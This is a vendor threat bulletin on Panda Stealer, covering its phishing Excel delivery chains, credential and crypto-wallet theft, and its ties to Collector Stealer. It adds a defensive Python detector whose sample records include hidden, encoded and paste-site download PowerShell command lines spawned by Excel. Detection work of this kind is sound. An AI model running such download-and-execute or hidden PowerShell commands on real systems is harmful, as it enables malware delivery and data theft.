
Panda Stealer: Spreading via Spam Emails and Discord

The malware hones in on cryptocurrency funds as well as VPN credentials.
The malware begins its infection chain through phishing emails; samples uploaded to VirusTotal also indicate that victims have been downloading executables from malicious websites via Discord links.
Panda Stealer’s phishing emails pretend to be business quote requests.
What has happened?
According to Trend Micro researchers, the new stealer was discovered in April 2021. The most recent wave of the spam campaign had the biggest impact on Australia, Germany, Japan, and the U.S.
• The stealer is spreading via spam and phishing emails masquerading as business quote requests to fool victims into clicking on malicious Excel files. Two infection chains are spreading the stealer.
• The first one has an ‘.XLSM’ attachment with malicious macros that download a loader. Next, the loader downloads and executes the main stealer.
• The second method involves an attached .XLS file with an Excel formula that uses a PowerShell command to access a Pastebin alternative, paste[.]ee, which in turn retrieves a second, encrypted PowerShell command.
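Both chains described above end with an Office process handing off to PowerShell, and the second one reaches out to a paste site for its next stage. The following is an added detection example written for this bulletin, not code from Trend Micro or CIEL: it scans a handful of constructed Sysmon-style process-creation records (the field names, process IDs and command lines are all assumptions, and paste[.]ee is the only host taken from the bulletin) and flags an Office parent spawning a shell, a command line that references a paste site, and an encoded PowerShell command.

```python
"""Flag Excel-spawned PowerShell matching the Panda Stealer delivery chain.

The records below are constructed, not real telemetry. Field names follow
Sysmon Event ID 1 (ProcessId, Image, ParentImage, CommandLine) but the
'key=value|key=value' layout is an assumption made for this example.
"""
import re
from dataclasses import dataclass

# Office binaries that should not normally launch a shell. EXCEL.EXE is the
# parent in the bulletin's .XLS/.XLSM chains; the others are added for coverage.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
# paste.ee comes from the bulletin; pastebin.com is an assumed similar service.
PASTE_HOSTS = ("paste.ee", "pastebin.com")
# Common spellings of PowerShell's -EncodedCommand switch.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e)(?:\s|$)")


@dataclass
class Finding:
    pid: int
    reason: str


def parse_event(line: str) -> dict:
    """Split one constructed 'key=value|key=value' record into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the reasons an event looks like the delivery chain, or []."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if parent in OFFICE_PARENTS and image in SHELLS:
        reasons.append(f"{parent} spawned {image}")
    if any(host in cmd.lower() for host in PASTE_HOSTS):
        reasons.append("command line references a paste site")
    if image in {"powershell.exe", "pwsh.exe"} and ENCODED_FLAG.search(cmd):
        reasons.append("encoded PowerShell command")
    return reasons


def scan(lines) -> list[Finding]:
    """Run classify() over every record and collect the suspicious ones."""
    findings = []
    for line in lines:
        event = parse_event(line)
        reasons = classify(event)
        if reasons:
            findings.append(Finding(int(event["ProcessId"]), "; ".join(reasons)))
    return findings


OFFICE = "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed sample records: one benign Excel launch, two Excel-spawned
# PowerShell processes, and one benign scheduled script run.
SAMPLE_EVENTS = [
    f"ProcessId=3980|Image={OFFICE}|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=\"EXCEL.EXE\" C:\\Users\\alice\\Downloads\\quote_request.xlsm",
    f"ProcessId=4212|Image={PS}|ParentImage={OFFICE}"
    "|CommandLine=powershell.exe -w hidden -enc <BASE64_PLACEHOLDER>",
    f"ProcessId=4300|Image={PS}|ParentImage={OFFICE}"
    "|CommandLine=powershell.exe -NoP -c \"iwr https://paste.ee/r/PLACEHOLDER\"",
    f"ProcessId=5120|Image={PS}|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=powershell.exe -NoProfile -File C:\\scripts\\nightly_backup.ps1",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"PID {finding.pid}: {finding.reason}")
```

The parent/child check is the one that survives changes in the second stage: whatever host or encoding the macro or formula uses, Excel still has to start a shell, so that pairing is the event worth alerting on first, with the paste-site and encoding checks adding confidence.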
Additional insights
• Researchers found 264 files similar to Panda Stealer on VirusTotal and some of them were being shared on Discord.
• In addition, the stealer uses the fileless distribution method of the Fair variant of the Phobos ransomware to avoid detection.
Post-infection activities
• Once Panda Stealer is successfully deployed, it tries to steal information such as past transactions from cryptocurrency wallets, including Bytecoin, Dash, Ethereum, and Litecoin.
• Moreover, it can steal credentials from applications, such as NordVPN, Telegram, Steam, and Discord.
• It can take screenshots of the infected system and swipe cookies and passwords from browsers.
Similarities with Collector Stealer
Panda Stealer is a modified version of Collector Stealer (aka DC Stealer) that is available on underground forums and Telegram for the price tag of $12. It’s promoted as a top-end stealer and comes with a Russian interface.
• A threat actor named NCP (aka su1c1de) has cracked Collector Stealer. That stealer and Panda appear to behave similarly; however, they don’t share the same C2 URLs, build tags, or execution folders.
• Moreover, both Panda Stealer and Collector Stealer exfiltrate information such as web data, cookies, and login data from a compromised system and store them in an SQLite3 database.
Conclusion
Cybercriminals modified the existing Collector Stealer malware by adding new features to make Panda Stealer more efficient. This makes it harder for organizations to detect and spot this malware. Therefore, organizations are recommended to use behavior-based solutions that detect malicious files and spam emails and block malicious URLs, and to use digital certificates for authentication purposes issued by a neutral third party, the Certificate Authority (CA).
For your information, we can assist you in this case and have the required
solutions at hand. Do contact us – we speak your language.
Info@ciel.com.lb – +961 1 285 666 – www.ciel.com.lb